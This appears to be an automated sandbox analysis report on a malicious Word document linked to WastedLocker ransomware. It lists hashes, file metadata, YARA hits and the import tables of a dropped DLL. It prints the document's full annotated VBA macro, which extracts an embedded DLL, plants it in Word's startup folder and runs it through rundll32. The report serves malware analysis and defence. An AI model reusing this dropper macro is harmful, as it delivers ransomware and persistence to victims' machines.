Verdict: Malicious

Classifications: Ransomware, Injector, Downloader

Threat Names: WastedLocker, Mal/HTMLGen-A, Gen:Variant.Jacard.222844, Trojan.GenericKD.45628116 (+2 more not shown)

Remarks (1/1)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "16 minutes" to "2 minutes, 40 seconds" to reveal dormant functionality.

File Name: C:\Users\kEecfMwgj\Desktop\0524_4109399728218.doc
Category: Sample File
Type: Word Document
Verdict: malicious
MIME Type: application/msword
File Size: 1.27 MB
MD5: 14f4c470c207e22c3b0a4efa7b4200e8
SHA1: 21180195396580a9ade32b589490cf3bc94d3b5b
SHA256: 0b22278ddb598d63f07eb983bcf307e0852cd3005c5bc15d4a4f26455562c8ec
SSDeep: 24576:nEIjrPUaphvGvGUZ93/semhXp7AsWIKHaY8k5faaboEy6r8zz1:n/jhvGvGU93097AFIKbv0WY/1
ImpHash: -
AV Matches (2)
Threat Name | Verdict
Gen:Variant.Jacard.222844 | malicious
Gen:Variant.Jacard.222844 | malicious
Office Information
Creator: MyPc
Last Modified By: MyPc
Revision: 2
Create Time: 2021-05-24 12:32:00+00:00
Modify Time: 2021-05-24 12:32:00+00:00
Codepage: ANSI_Latin1
Application: Microsoft Office Word
App Version: 16.0
Template: Normal.dotm
Document Security: NONE
Page Count: 1
Line Count: 1
Paragraph Count: 1
Word Count: 3
Character Count: 21
Chars With Spaces: 23
scale_crop: False
shared_doc: False
Controls (2)
CLSID | Control Name | Associated Vulnerability
{00020906-0000-0000-C000-000000000046} | Word97 | -
{0003000C-0000-0000-C000-000000000046} | Package | EmbeddedFile
VBA Macros (1)
Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Compare Text
Option Explicit
' Module-level variable: receives the full path of the extracted payload (jax.k) from Search().
Dim pafs As String

' Auto-executes when the document is opened (no user interaction beyond enabling macros).
Private Sub Document_Open()
    Dim uis As String
    uis = Options.DefaultFilePath(wdStartupPath)
    ' Only act if the payload has not already been planted in the Word startup folder.
    If Dir(uis & "\ket.t") = "" Then
        ' yyy: select and copy the embedded Package object; the report shows the
        ' embedded file materialising in Word's temp folder as jax.k.
        Call yyy
        ' xxx: locate jax.k under the temp folder and store its path in pafs.
        Call xxx
        If pafs = "" Then
            ' Payload not found: nothing to do.
        Else
            Dim iel As String
            Dim ued As String
            ued = ".exe"
            iel = Options.DefaultFilePath(wdStartupPath)
            ' Move jax.k into the Word startup folder as ket.t, then load it as a DLL via
            ' rundll32 and call its export EUAYKIYBPAX.
            Name pafs As iel & "\ket.t"
            Shell ("rundll32" & ued & " " & Options.DefaultFilePath(wdStartupPath) & "\ket.t,EUAYKIYBPAX")
        End If
    End If
End Sub

' Recursively searches Word's temp folder for the extracted payload.
Sub xxx()
    Dim FSO As Object
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Search FSO.GetFolder(Options.DefaultFilePath(wdTempFilePath))
End Sub

' Navigates the cursor onto the embedded object in the document body and copies it.
Sub yyy()
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
End Sub

' Depth-first search of a folder tree for a file named jax.k.
Sub Search(mds As Object)
    Dim Mysob As Object
    Dim Fil As Object
    For Each Mysob In mds.SubFolders
        Search Mysob
    Next Mysob
    For Each Fil In mds.Files
        If Fil.Name = "jax.k" Then
            pafs = Fil
        End If
    Next Fil
    Exit Sub
' ErrHandle is dead code: no On Error GoTo refers to it, so Exit Sub always returns first.
ErrHandle:
    Err.Clear
End Sub



Document Content
EMBED Package
CFB Streams (19)
Name | ID | Size
Root\Data | 1 | 552.93 KB
Root\WordDocument | 2 | 4.00 KB
Root\ObjectPool\_1683339676\EPRINT | 5 | 4.85 KB
Root\ObjectPool\_1683339676\CompObj | 6 | 76 Bytes
Root\ObjectPool\_1683339676\ObjInfo | 7 | 6 Bytes
Root\ObjectPool\_1683339676\Ole10Native | 8 | 704.28 KB
Root\Table | 9 | 8.30 KB
Root\SummaryInformation | 10 | 412 Bytes
Root\DocumentSummaryInformation | 11 | 280 Bytes
Root\Macros\VBA\dir | 14 | 514 Bytes
Root\Macros\VBA\__SRP_0 | 15 | 2.15 KB
Root\Macros\VBA\__SRP_1 | 16 | 193 Bytes
Root\Macros\VBA\__SRP_2 | 17 | 1.67 KB
Root\Macros\VBA\__SRP_3 | 18 | 322 Bytes
Root\Macros\VBA\ThisDocument | 19 | 4.53 KB
Root\Macros\VBA\_VBA_PROJECT | 20 | 2.68 KB
Root\Macros\PROJECT | 21 | 373 Bytes
Root\Macros\PROJECTwm | 22 | 41 Bytes
Root\CompObj | 23 | 114 Bytes
YARA Matches (2)
Rule Name | Rule Description | Classification | Score
Document_Contains_Embedded_PE_File | PE file inside a document; possible malware dropper | - | 3/5
Document_Contains_Embedded_PE_File | PE file inside a document; possible malware dropper | - | 3/5
File Name: c:\users\keecfmwgj\appdata\local\temp\jax.k
Category: Dropped File
Type: Binary
Verdict: malicious
Also Known As: c:\users\keecfmwgj\appdata\roaming\microsoft\word\startup\ket.t (Dropped File)
MIME Type: application/vnd.microsoft.portable-executable
File Size: 704.00 KB
MD5: 9dc6f214fc82d637de2f68f3c519d339
SHA1: aaa425f7377d405bea59b8adfb65afc0c8869886
SHA256: 2a8b737a4752060a308c4312b7c0cf6c05cde5b370906286dea9cdd36f5aa613
SSDeep: 12288:uC69N9C/hMHx8kzFfagPtKEp6E72y/N0hwOGt+gBd8x+6vLrD1ag:HKHaY8k5faaboEy6r8zz1
ImpHash: 976cbee04383163867f763148191e313
AV Matches (1)
Threat Name | Verdict
Gen:Variant.Jacard.222844 | malicious
PE Information
Image Base: 0x400000
Entry Point: 0x492348
Size Of Code: 0x91400
Size Of Initialized Data: 0x1e800
File Type: FileType.dll
Subsystem: Subsystem.windows_gui
Machine Type: MachineType.i386
Compile Timestamp: 1992-06-19 22:22:17+00:00 (the fixed value written by Borland/Delphi linkers, not the real build date)
Sections (6)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy
CODE | 0x401000 | 0x91368 | 0x91400 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.52
DATA | 0x493000 | 0x17a4 | 0x1800 | 0x91800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.33
BSS | 0x495000 | 0xd25 | 0x0 | 0x93000 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0.0
.idata | 0x496000 | 0x244a | 0x2600 | 0x93000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.79
.reloc | 0x499000 | 0xa918 | 0xaa00 | 0x95600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ | 6.62
.rsrc | 0x4a4000 | 0x10000 | 0x10000 | 0xa0000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ | 6.15
Imports (16)
kernel32.dll (34)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
DeleteCriticalSection - 0x496154 0x96154 0x93154 0x0
LeaveCriticalSection - 0x496158 0x96158 0x93158 0x0
EnterCriticalSection - 0x49615c 0x9615c 0x9315c 0x0
InitializeCriticalSection - 0x496160 0x96160 0x93160 0x0
VirtualFree - 0x496164 0x96164 0x93164 0x0
VirtualAlloc - 0x496168 0x96168 0x93168 0x0
LocalFree - 0x49616c 0x9616c 0x9316c 0x0
LocalAlloc - 0x496170 0x96170 0x93170 0x0
GetVersion - 0x496174 0x96174 0x93174 0x0
GetCurrentThreadId - 0x496178 0x96178 0x93178 0x0
InterlockedDecrement - 0x49617c 0x9617c 0x9317c 0x0
InterlockedIncrement - 0x496180 0x96180 0x93180 0x0
VirtualQuery - 0x496184 0x96184 0x93184 0x0
WideCharToMultiByte - 0x496188 0x96188 0x93188 0x0
MultiByteToWideChar - 0x49618c 0x9618c 0x9318c 0x0
lstrlenA - 0x496190 0x96190 0x93190 0x0
lstrcpynA - 0x496194 0x96194 0x93194 0x0
LoadLibraryExA - 0x496198 0x96198 0x93198 0x0
GetThreadLocale - 0x49619c 0x9619c 0x9319c 0x0
GetStartupInfoA - 0x4961a0 0x961a0 0x931a0 0x0
GetProcAddress - 0x4961a4 0x961a4 0x931a4 0x0
GetModuleHandleA - 0x4961a8 0x961a8 0x931a8 0x0
GetModuleFileNameA - 0x4961ac 0x961ac 0x931ac 0x0
GetLocaleInfoA - 0x4961b0 0x961b0 0x931b0 0x0
GetCommandLineA - 0x4961b4 0x961b4 0x931b4 0x0
FreeLibrary - 0x4961b8 0x961b8 0x931b8 0x0
FindFirstFileA - 0x4961bc 0x961bc 0x931bc 0x0
FindClose - 0x4961c0 0x961c0 0x931c0 0x0
ExitProcess - 0x4961c4 0x961c4 0x931c4 0x0
WriteFile - 0x4961c8 0x961c8 0x931c8 0x0
UnhandledExceptionFilter - 0x4961cc 0x961cc 0x931cc 0x0
RtlUnwind - 0x4961d0 0x961d0 0x931d0 0x0
RaiseException - 0x4961d4 0x961d4 0x931d4 0x0
GetStdHandle - 0x4961d8 0x961d8 0x931d8 0x0
user32.dll (4)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
GetKeyboardType - 0x4961e0 0x961e0 0x931e0 0x0
LoadStringA - 0x4961e4 0x961e4 0x931e4 0x0
MessageBoxA - 0x4961e8 0x961e8 0x931e8 0x0
CharNextA - 0x4961ec 0x961ec 0x931ec 0x0
advapi32.dll (3)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
RegQueryValueExA - 0x4961f4 0x961f4 0x931f4 0x0
RegOpenKeyExA - 0x4961f8 0x961f8 0x931f8 0x0
RegCloseKey - 0x4961fc 0x961fc 0x931fc 0x0
oleaut32.dll (3)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
SysFreeString - 0x496204 0x96204 0x93204 0x0
SysReAllocStringLen - 0x496208 0x96208 0x93208 0x0
SysAllocStringLen - 0x49620c 0x9620c 0x9320c 0x0
kernel32.dll (6)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
TlsSetValue - 0x496214 0x96214 0x93214 0x0
TlsGetValue - 0x496218 0x96218 0x93218 0x0
TlsFree - 0x49621c 0x9621c 0x9321c 0x0
TlsAlloc - 0x496220 0x96220 0x93220 0x0
LocalFree - 0x496224 0x96224 0x93224 0x0
LocalAlloc - 0x496228 0x96228 0x93228 0x0
advapi32.dll (3)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
RegQueryValueExA - 0x496230 0x96230 0x93230 0x0
RegOpenKeyExA - 0x496234 0x96234 0x93234 0x0
RegCloseKey - 0x496238 0x96238 0x93238 0x0
kernel32.dll (69)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
lstrcpyA - 0x496240 0x96240 0x93240 0x0
lstrcmpA - 0x496244 0x96244 0x93244 0x0
WriteFile - 0x496248 0x96248 0x93248 0x0
WaitForSingleObject - 0x49624c 0x9624c 0x9324c 0x0
VirtualQuery - 0x496250 0x96250 0x93250 0x0
VirtualAlloc - 0x496254 0x96254 0x93254 0x0
Sleep - 0x496258 0x96258 0x93258 0x0
SizeofResource - 0x49625c 0x9625c 0x9325c 0x0
SetThreadLocale - 0x496260 0x96260 0x93260 0x0
SetFilePointer - 0x496264 0x96264 0x93264 0x0
SetEvent - 0x496268 0x96268 0x93268 0x0
SetErrorMode - 0x49626c 0x9626c 0x9326c 0x0
SetEndOfFile - 0x496270 0x96270 0x93270 0x0
ResetEvent - 0x496274 0x96274 0x93274 0x0
ReadFile - 0x496278 0x96278 0x93278 0x0
MultiByteToWideChar - 0x49627c 0x9627c 0x9327c 0x0
MulDiv - 0x496280 0x96280 0x93280 0x0
LockResource - 0x496284 0x96284 0x93284 0x0
LoadResource - 0x496288 0x96288 0x93288 0x0
LoadLibraryA - 0x49628c 0x9628c 0x9328c 0x0
LeaveCriticalSection - 0x496290 0x96290 0x93290 0x0
InitializeCriticalSection - 0x496294 0x96294 0x93294 0x0
GlobalUnlock - 0x496298 0x96298 0x93298 0x0
GlobalReAlloc - 0x49629c 0x9629c 0x9329c 0x0
GlobalHandle - 0x4962a0 0x962a0 0x932a0 0x0
GlobalLock - 0x4962a4 0x962a4 0x932a4 0x0
GlobalFree - 0x4962a8 0x962a8 0x932a8 0x0
GlobalFindAtomA - 0x4962ac 0x962ac 0x932ac 0x0
GlobalDeleteAtom - 0x4962b0 0x962b0 0x932b0 0x0
GlobalAlloc - 0x4962b4 0x962b4 0x932b4 0x0
GlobalAddAtomA - 0x4962b8 0x962b8 0x932b8 0x0
GetVersionExA - 0x4962bc 0x962bc 0x932bc 0x0
GetVersion - 0x4962c0 0x962c0 0x932c0 0x0
GetTickCount - 0x4962c4 0x962c4 0x932c4 0x0
GetThreadLocale - 0x4962c8 0x962c8 0x932c8 0x0
GetSystemInfo - 0x4962cc 0x962cc 0x932cc 0x0
GetStringTypeExA - 0x4962d0 0x962d0 0x932d0 0x0
GetStdHandle - 0x4962d4 0x962d4 0x932d4 0x0
GetProcAddress - 0x4962d8 0x962d8 0x932d8 0x0
GetModuleHandleA - 0x4962dc 0x962dc 0x932dc 0x0
GetModuleFileNameA - 0x4962e0 0x962e0 0x932e0 0x0
GetLocaleInfoA - 0x4962e4 0x962e4 0x932e4 0x0
GetLocalTime - 0x4962e8 0x962e8 0x932e8 0x0
GetLastError - 0x4962ec 0x962ec 0x932ec 0x0
GetFullPathNameA - 0x4962f0 0x962f0 0x932f0 0x0
GetDiskFreeSpaceA - 0x4962f4 0x962f4 0x932f4 0x0
GetDateFormatA - 0x4962f8 0x962f8 0x932f8 0x0
GetCurrentThreadId - 0x4962fc 0x962fc 0x932fc 0x0
GetCurrentProcessId - 0x496300 0x96300 0x93300 0x0
GetCPInfo - 0x496304 0x96304 0x93304 0x0
GetACP - 0x496308 0x96308 0x93308 0x0
FreeResource - 0x49630c 0x9630c 0x9330c 0x0
InterlockedExchange - 0x496310 0x96310 0x93310 0x0
FreeLibrary - 0x496314 0x96314 0x93314 0x0
FormatMessageA - 0x496318 0x96318 0x93318 0x0
FindResourceA - 0x49631c 0x9631c 0x9331c 0x0
FindFirstFileA - 0x496320 0x96320 0x93320 0x0
FindClose - 0x496324 0x96324 0x93324 0x0
FileTimeToLocalFileTime - 0x496328 0x96328 0x93328 0x0
FileTimeToDosDateTime - 0x49632c 0x9632c 0x9332c 0x0
EnumCalendarInfoA - 0x496330 0x96330 0x93330 0x0
EnterCriticalSection - 0x496334 0x96334 0x93334 0x0
DeleteFileA - 0x496338 0x96338 0x93338 0x0
DeleteCriticalSection - 0x49633c 0x9633c 0x9333c 0x0
CreateThread - 0x496340 0x96340 0x93340 0x0
CreateFileA - 0x496344 0x96344 0x93344 0x0
CreateEventA - 0x496348 0x96348 0x93348 0x0
CompareStringA - 0x49634c 0x9634c 0x9334c 0x0
CloseHandle - 0x496350 0x96350 0x93350 0x0
version.dll (3)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
VerQueryValueA - 0x496358 0x96358 0x93358 0x0
GetFileVersionInfoSizeA - 0x49635c 0x9635c 0x9335c 0x0
GetFileVersionInfoA - 0x496360 0x96360 0x93360 0x0
gdi32.dll (70)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
UnrealizeObject - 0x496368 0x96368 0x93368 0x0
StretchBlt - 0x49636c 0x9636c 0x9336c 0x0
SetWindowOrgEx - 0x496370 0x96370 0x93370 0x0
SetWinMetaFileBits - 0x496374 0x96374 0x93374 0x0
SetViewportOrgEx - 0x496378 0x96378 0x93378 0x0
SetTextColor - 0x49637c 0x9637c 0x9337c 0x0
SetStretchBltMode - 0x496380 0x96380 0x93380 0x0
SetROP2 - 0x496384 0x96384 0x93384 0x0
SetPixel - 0x496388 0x96388 0x93388 0x0
SetEnhMetaFileBits - 0x49638c 0x9638c 0x9338c 0x0
SetDIBColorTable - 0x496390 0x96390 0x93390 0x0
SetBrushOrgEx - 0x496394 0x96394 0x93394 0x0
SetBkMode - 0x496398 0x96398 0x93398 0x0
SetBkColor - 0x49639c 0x9639c 0x9339c 0x0
SelectPalette - 0x4963a0 0x963a0 0x933a0 0x0
SelectObject - 0x4963a4 0x963a4 0x933a4 0x0
SaveDC - 0x4963a8 0x963a8 0x933a8 0x0
RestoreDC - 0x4963ac 0x963ac 0x933ac 0x0
Rectangle - 0x4963b0 0x963b0 0x933b0 0x0
RectVisible - 0x4963b4 0x963b4 0x933b4 0x0
RealizePalette - 0x4963b8 0x963b8 0x933b8 0x0
Polyline - 0x4963bc 0x963bc 0x933bc 0x0
Polygon - 0x4963c0 0x963c0 0x933c0 0x0
PlayEnhMetaFile - 0x4963c4 0x963c4 0x933c4 0x0
PatBlt - 0x4963c8 0x963c8 0x933c8 0x0
MoveToEx - 0x4963cc 0x963cc 0x933cc 0x0
MaskBlt - 0x4963d0 0x963d0 0x933d0 0x0
LineTo - 0x4963d4 0x963d4 0x933d4 0x0
IntersectClipRect - 0x4963d8 0x963d8 0x933d8 0x0
GetWindowOrgEx - 0x4963dc 0x963dc 0x933dc 0x0
GetWinMetaFileBits - 0x4963e0 0x963e0 0x933e0 0x0
GetTextMetricsA - 0x4963e4 0x963e4 0x933e4 0x0
GetTextExtentPointA - 0x4963e8 0x963e8 0x933e8 0x0
GetTextExtentPoint32A - 0x4963ec 0x963ec 0x933ec 0x0
GetSystemPaletteEntries - 0x4963f0 0x963f0 0x933f0 0x0
GetStockObject - 0x4963f4 0x963f4 0x933f4 0x0
GetPixel - 0x4963f8 0x963f8 0x933f8 0x0
GetPaletteEntries - 0x4963fc 0x963fc 0x933fc 0x0
GetObjectA - 0x496400 0x96400 0x93400 0x0
GetEnhMetaFilePaletteEntries - 0x496404 0x96404 0x93404 0x0
GetEnhMetaFileHeader - 0x496408 0x96408 0x93408 0x0
GetEnhMetaFileBits - 0x49640c 0x9640c 0x9340c 0x0
GetEnhMetaFileW - 0x496410 0x96410 0x93410 0x0
GetDeviceCaps - 0x496414 0x96414 0x93414 0x0
GetDIBits - 0x496418 0x96418 0x93418 0x0
GetDIBColorTable - 0x49641c 0x9641c 0x9341c 0x0
GetDCOrgEx - 0x496420 0x96420 0x93420 0x0
GetCurrentPositionEx - 0x496424 0x96424 0x93424 0x0
GetClipBox - 0x496428 0x96428 0x93428 0x0
GetBrushOrgEx - 0x49642c 0x9642c 0x9342c 0x0
GetBitmapBits - 0x496430 0x96430 0x93430 0x0
GdiFlush - 0x496434 0x96434 0x93434 0x0
ExcludeClipRect - 0x496438 0x96438 0x93438 0x0
DeleteObject - 0x49643c 0x9643c 0x9343c 0x0
DeleteEnhMetaFile - 0x496440 0x96440 0x93440 0x0
DeleteDC - 0x496444 0x96444 0x93444 0x0
CreateSolidBrush - 0x496448 0x96448 0x93448 0x0
CreatePenIndirect - 0x49644c 0x9644c 0x9344c 0x0
CreatePalette - 0x496450 0x96450 0x93450 0x0
CreateHalftonePalette - 0x496454 0x96454 0x93454 0x0
CreateFontIndirectA - 0x496458 0x96458 0x93458 0x0
CreateDIBitmap - 0x49645c 0x9645c 0x9345c 0x0
CreateDIBSection - 0x496460 0x96460 0x93460 0x0
CreateCompatibleDC - 0x496464 0x96464 0x93464 0x0
CreateCompatibleBitmap - 0x496468 0x96468 0x93468 0x0
CreateBrushIndirect - 0x49646c 0x9646c 0x9346c 0x0
CreateBitmap - 0x496470 0x96470 0x93470 0x0
CopyEnhMetaFileA - 0x496474 0x96474 0x93474 0x0
BitBlt - 0x496478 0x96478 0x93478 0x0
AddFontResourceA - 0x49647c 0x9647c 0x9347c 0x0
user32.dll (168)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint
CreateWindowExA - 0x496484 0x96484 0x93484 0x0
WindowFromPoint - 0x496488 0x96488 0x93488 0x0
WinHelpA - 0x49648c 0x9648c 0x9348c 0x0
WaitMessage - 0x496490 0x96490 0x93490 0x0
UpdateWindow - 0x496494 0x96494 0x93494 0x0
UnregisterClassA - 0x496498 0x96498 0x93498 0x0
UnhookWindowsHookEx - 0x49649c 0x9649c 0x9349c 0x0
TranslateMessage - 0x4964a0 0x964a0 0x934a0 0x0
TranslateMDISysAccel - 0x4964a4 0x964a4 0x934a4 0x0
TrackPopupMenu - 0x4964a8 0x964a8 0x934a8 0x0
SystemParametersInfoA - 0x4964ac 0x964ac 0x934ac 0x0
ShowWindow - 0x4964b0 0x964b0 0x934b0 0x0
ShowScrollBar - 0x4964b4 0x964b4 0x934b4 0x0
ShowOwnedPopups - 0x4964b8 0x964b8 0x934b8 0x0
ShowCursor - 0x4964bc 0x964bc 0x934bc 0x0
ShowCaret - 0x4964c0 0x964c0 0x934c0 0x0
SetWindowsHookExA - 0x4964c4 0x964c4 0x934c4 0x0
SetWindowTextA - 0x4964c8 0x964c8 0x934c8 0x0
SetWindowPos - 0x4964cc 0x964cc 0x934cc 0x0
SetWindowPlacement - 0x4964d0 0x964d0 0x934d0 0x0
SetWindowLongA - 0x4964d4 0x964d4 0x934d4 0x0
SetTimer - 0x4964d8 0x964d8 0x934d8 0x0
SetScrollRange - 0x4964dc 0x964dc 0x934dc 0x0
SetScrollPos - 0x4964e0 0x964e0 0x934e0 0x0
SetScrollInfo - 0x4964e4 0x964e4 0x934e4 0x0
SetRect - 0x4964e8 0x964e8 0x934e8 0x0
SetPropA - 0x4964ec 0x964ec 0x934ec 0x0
SetParent - 0x4964f0 0x964f0 0x934f0 0x0
SetMenuItemInfoA - 0x4964f4 0x964f4 0x934f4 0x0
SetMenu - 0x4964f8 0x964f8 0x934f8 0x0
SetForegroundWindow - 0x4964fc 0x964fc 0x934fc 0x0
SetFocus - 0x496500 0x96500 0x93500 0x0
SetCursor - 0x496504 0x96504 0x93504 0x0
SetClipboardData - 0x496508 0x96508 0x93508 0x0
SetClassLongA - 0x49650c 0x9650c 0x9350c 0x0
SetCapture - 0x496510 0x96510 0x93510 0x0
SetActiveWindow - 0x496514 0x96514 0x93514 0x0
SendMessageA - 0x496518 0x96518 0x93518 0x0
ScrollWindow - 0x49651c 0x9651c 0x9351c 0x0
ScreenToClient - 0x496520 0x96520 0x93520 0x0
RemovePropA - 0x496524 0x96524 0x93524 0x0
RemoveMenu - 0x496528 0x96528 0x93528 0x0
ReleaseDC - 0x49652c 0x9652c 0x9352c 0x0
ReleaseCapture - 0x496530 0x96530 0x93530 0x0
RegisterWindowMessageA - 0x496534 0x96534 0x93534 0x0
RegisterClipboardFormatA - 0x496538 0x96538 0x93538 0x0
RegisterClassA - 0x49653c 0x9653c 0x9353c 0x0
RedrawWindow - 0x496540 0x96540 0x93540 0x0
PtInRect - 0x496544 0x96544 0x93544 0x0
PostQuitMessage - 0x496548 0x96548 0x93548 0x0
PostMessageA - 0x49654c 0x9654c 0x9354c 0x0
PeekMessageA - 0x496550 0x96550 0x93550 0x0
OpenClipboard - 0x496554 0x96554 0x93554 0x0
OffsetRect - 0x496558 0x96558 0x93558 0x0
OemToCharA - 0x49655c 0x9655c 0x9355c 0x0
MessageBoxA - 0x496560 0x96560 0x93560 0x0
MessageBeep - 0x496564 0x96564 0x93564 0x0
MapWindowPoints - 0x496568 0x96568 0x93568 0x0
MapVirtualKeyA - 0x49656c 0x9656c 0x9356c 0x0
LoadStringA - 0x496570 0x96570 0x93570 0x0
LoadKeyboardLayoutA - 0x496574 0x96574 0x93574 0x0
LoadIconA - 0x496578 0x96578 0x93578 0x0
LoadCursorW - 0x49657c 0x9657c 0x9357c 0x0
LoadCursorA - 0x496580 0x96580 0x93580 0x0
LoadBitmapA - 0x496584 0x96584 0x93584 0x0
KillTimer - 0x496588 0x96588 0x93588 0x0
IsZoomed - 0x49658c 0x9658c 0x9358c 0x0
IsWindowVisible - 0x496590 0x96590 0x93590 0x0
IsWindowEnabled - 0x496594 0x96594 0x93594 0x0
IsWindow - 0x496598 0x96598 0x93598 0x0
IsRectEmpty - 0x49659c 0x9659c 0x9359c 0x0
IsIconic - 0x4965a0 0x965a0 0x935a0 0x0
IsDialogMessageA - 0x4965a4 0x965a4 0x935a4 0x0
IsChild - 0x4965a8 0x965a8 0x935a8 0x0
InvalidateRect - 0x4965ac 0x965ac 0x935ac 0x0
IntersectRect - 0x4965b0 0x965b0 0x935b0 0x0
InsertMenuItemA - 0x4965b4 0x965b4 0x935b4 0x0
InsertMenuA - 0x4965b8 0x965b8 0x935b8 0x0
InflateRect - 0x4965bc 0x965bc 0x935bc 0x0
HideCaret - 0x4965c0 0x965c0 0x935c0 0x0
GetWindowThreadProcessId - 0x4965c4 0x965c4 0x935c4 0x0
GetWindowTextA - 0x4965c8 0x965c8 0x935c8 0x0
GetWindowRect - 0x4965cc 0x965cc 0x935cc 0x0
GetWindowPlacement - 0x4965d0 0x965d0 0x935d0 0x0
GetWindowLongA - 0x4965d4 0x965d4 0x935d4 0x0
GetWindowDC - 0x4965d8 0x965d8 0x935d8 0x0
GetTopWindow - 0x4965dc 0x965dc 0x935dc 0x0
GetSystemMetrics - 0x4965e0 0x965e0 0x935e0 0x0
GetSystemMenu - 0x4965e4 0x965e4 0x935e4 0x0
GetSysColorBrush - 0x4965e8 0x965e8 0x935e8 0x0
GetSysColor - 0x4965ec 0x965ec 0x935ec 0x0
GetSubMenu - 0x4965f0 0x965f0 0x935f0 0x0
GetScrollRange - 0x4965f4 0x965f4 0x935f4 0x0
GetScrollPos - 0x4965f8 0x965f8 0x935f8 0x0
GetScrollInfo - 0x4965fc 0x965fc 0x935fc 0x0
GetPropA - 0x496600 0x96600 0x93600 0x0
GetParent - 0x496604 0x96604 0x93604 0x0
GetWindow - 0x496608 0x96608 0x93608 0x0
GetMenuStringA - 0x49660c 0x9660c 0x9360c 0x0
GetMenuState - 0x496610 0x96610 0x93610 0x0
GetMenuItemInfoA - 0x496614 0x96614 0x93614 0x0
GetMenuItemID - 0x496618 0x96618 0x93618 0x0
GetMenuItemCount - 0x49661c 0x9661c 0x9361c 0x0
GetMenu - 0x496620 0x96620 0x93620 0x0
GetLastActivePopup - 0x496624 0x96624 0x93624 0x0
GetKeyboardState - 0x496628 0x96628 0x93628 0x0
GetKeyboardLayoutList - 0x49662c 0x9662c 0x9362c 0x0
GetKeyboardLayout - 0x496630 0x96630 0x93630 0x0
GetKeyState - 0x496634 0x96634 0x93634 0x0
GetKeyNameTextA - 0x496638 0x96638 0x93638 0x0
GetIconInfo - 0x49663c 0x9663c 0x9363c 0x0
GetForegroundWindow - 0x496640 0x96640 0x93640 0x0
GetFocus - 0x496644 0x96644 0x93644 0x0
GetDesktopWindow - 0x496648 0x96648 0x93648 0x0
GetDCEx - 0x49664c 0x9664c 0x9364c 0x0
GetDC - 0x496650 0x96650 0x93650 0x0
GetCursorPos - 0x496654 0x96654 0x93654 0x0
GetCursor - 0x496658 0x96658 0x93658 0x0
GetClipboardData - 0x49665c 0x9665c 0x9365c 0x0
GetClientRect - 0x496660 0x96660 0x93660 0x0
GetClassNameA - 0x496664 0x96664 0x93664 0x0
GetClassInfoA - 0x496668 0x96668 0x93668 0x0
GetCapture - 0x49666c 0x9666c 0x9366c 0x0
GetAsyncKeyState - 0x496670 0x96670 0x93670 0x0
GetActiveWindow - 0x496674 0x96674 0x93674 0x0
FrameRect - 0x496678 0x96678 0x93678 0x0
FindWindowA - 0x49667c 0x9667c 0x9367c 0x0
FillRect - 0x496680 0x96680 0x93680 0x0
EqualRect - 0x496684 0x96684 0x93684 0x0
EnumWindows - 0x496688 0x96688 0x93688 0x0
EnumThreadWindows - 0x49668c 0x9668c 0x9368c 0x0
EndPaint - 0x496690 0x96690 0x93690 0x0
EnableWindow - 0x496694 0x96694 0x93694 0x0
EnableScrollBar - 0x496698 0x96698 0x93698 0x0
EnableMenuItem - 0x49669c 0x9669c 0x9369c 0x0
EmptyClipboard - 0x4966a0 0x966a0 0x936a0 0x0
DrawTextA - 0x4966a4 0x966a4 0x936a4 0x0
DrawStateA - 0x4966a8 0x966a8 0x936a8 0x0
DrawMenuBar - 0x4966ac 0x966ac 0x936ac 0x0
DrawIconEx - 0x4966b0 0x966b0 0x936b0 0x0
DrawIcon - 0x4966b4 0x966b4 0x936b4 0x0
DrawFrameControl - 0x4966b8 0x966b8 0x936b8 0x0
DrawEdge - 0x4966bc 0x966bc 0x936bc 0x0
DispatchMessageA - 0x4966c0 0x966c0 0x936c0 0x0
DestroyWindow - 0x4966c4 0x966c4 0x936c4 0x0
DestroyMenu - 0x4966c8 0x966c8 0x936c8 0x0
DestroyIcon - 0x4966cc 0x966cc 0x936cc 0x0
DestroyCursor - 0x4966d0 0x966d0 0x936d0 0x0
DeleteMenu - 0x4966d4 0x966d4 0x936d4 0x0
DefWindowProcA - 0x4966d8 0x966d8 0x936d8 0x0
DefMDIChildProcA - 0x4966dc 0x966dc 0x936dc 0x0
DefFrameProcA - 0x4966e0 0x966e0 0x936e0 0x0
CreatePopupMenu - 0x4966e4 0x966e4 0x936e4 0x0
CreateMenu - 0x4966e8 0x966e8 0x936e8 0x0
CreateIcon - 0x4966ec 0x966ec 0x936ec 0x0
